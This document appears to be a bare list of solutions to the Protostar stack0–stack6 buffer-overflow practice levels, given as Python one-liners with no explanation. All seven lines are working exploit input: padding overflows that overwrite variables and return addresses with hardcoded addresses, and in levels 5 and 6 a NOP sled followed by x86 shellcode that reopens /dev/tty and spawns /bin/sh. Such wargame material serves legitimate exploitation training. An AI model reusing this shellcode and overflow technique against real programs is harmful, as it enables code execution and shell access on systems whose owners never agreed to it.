0) python -c "print 'a'*65" | ./stack0

1) ./stack1 $(python -c "print 'a'*65")

2) GREENIE=$(python -c "print 'a'*64+'0a0d0a0d'.decode('hex')") ./stack2

3) python -c "print 'a'*64+'24840408'.decode('hex')" | ./stack3

4) python -c "print 'a'*76+'f4830408'.decode('hex')" | ./stack4

5) python -c "print 'a'*76+'49f8ffbf'.decode('hex')+'\x90'*257+'\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" | ./stack5

6) python -c "print 'a'*80+'f9840408'.decode('hex')+'49f8ffbf'.decode('hex')+'\x90'*257+'\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" | ./stack6
